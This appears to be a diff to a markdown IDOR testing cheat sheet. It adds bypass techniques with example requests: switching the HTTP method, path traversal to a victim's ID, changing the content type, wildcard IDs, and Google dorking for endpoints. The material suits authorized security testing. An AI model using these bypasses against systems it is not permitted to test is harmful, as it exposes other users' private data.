■ ■ ■ ■ ■ ■
Insecure Direct Object References.md
| skipped 113 lines |
114 | 114 | | GET /file?id=302 |
115 | 115 | | ``` |
116 | 116 | | |
| 117 | + | 12. Change HTTP Method |
| 118 | + | ``` |
| 119 | + | GET /api/v1/users/profile/111 |
| 120 | + | ``` |
| 121 | + | Try this to bypass |
| 122 | + | ``` |
| 123 | + | POST /api/v1/users/profile/111 |
| 124 | + | ``` |
| 125 | + | |
| 126 | + | 13. Path traversal |
| 127 | + | ``` |
| 128 | + | GET /api/v1/users/profile/victim_id |
| 129 | + | ``` |
| 130 | + | Try this to bypass |
| 131 | + | ``` |
| 132 | + | GET /api/v1/users/profile/my_id/../victim_id |
| 133 | + | ``` |
| 134 | + | |
| 135 | + | 14. Change request content type |
| 136 | + | ``` |
| 137 | + | Content-type: application/xml |
| 138 | + | ``` |
| 139 | + | Try this to bypass |
| 140 | + | ``` |
| 141 | + | Content-type: application/json |
| 142 | + | ``` |
| 143 | + | |
| 144 | + | 15. Send wildcard instead of ID |
| 145 | + | ``` |
| 146 | + | GET /api/users/111 |
| 147 | + | ``` |
| 148 | + | Try this to bypass |
| 149 | + | ``` |
| 150 | + | GET /api/users/* |
| 151 | + | ``` |
| 152 | + | |
| 153 | + | 16. Try google dorking to find new endpoint |
| 154 | + | |
117 | 155 | | Reference: |
118 | 156 | | - [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup |
119 | 157 | | |